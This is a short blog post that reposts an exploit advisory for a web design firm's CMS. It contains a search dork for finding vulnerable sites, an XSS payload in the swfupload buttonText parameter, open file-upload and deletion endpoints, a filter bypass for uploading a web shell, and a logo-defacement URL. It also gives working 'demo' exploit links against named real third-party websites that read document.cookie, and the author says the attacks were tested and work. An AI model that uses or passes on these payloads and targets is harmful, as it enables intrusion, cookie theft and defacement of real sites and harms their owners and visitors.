SHARE
A news from a Twitter post is coming that a web designing company SILENT BLAST website silentblast.com has multiple vulnerabilities in swf upload and we tested them they are working , when we are on twitter we saw a post from @Inj3ct0r they posted:
 
We have tested dork which is given below here is the screenshot
 
index list
 
 

The Complete details from Inj3at0r is below:

Title : CMS Provided by Silentblast Interactive Multiple Vulnerabilities

# Date: 2013-03-15

# Software Link: http://www.silentblast.com/

# Credit: This Bug was founded by Asesino04 “The Black Devils”

# Tested on: Windows XP SP2

# Category: [webapps]

# Dork : inurl:/admin/includes/swfupload/

———–

Xss

http://127.0.0.1/path/components/com_wordpress/path/wp-includes/js/swfupload/swfupload.swf?buttonText=[ XSS ]

doc_upload

you can upload files and remove others

http://127.0.0.1/admin/includes/doc_upload.php

image upload yu can bypass it and upload  a shell

http://www.doncarmody.com/admin/includes/image_upload.php

then you’ll find your file here

http://127.0.0.1/images/cms/

and from here you can easily change the logo picture

http://127.0.0.1/admin/includes/image_upload.php?moduleID=1&imageName=cmsLogo&module=cmsSettings&type=cmslogo&categoryID=0

 https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/c0.0.380.380/p403x403/581866_256194131184828_1398221432_n.jpg

# Demo :

http://www.doncarmody.com/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

http://www.stlukesmerced.org/admin/includes/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

You can check the Direct Link

NO COMMENTS

LEAVE A REPLY

This site uses Akismet to reduce spam. Learn how your comment data is processed.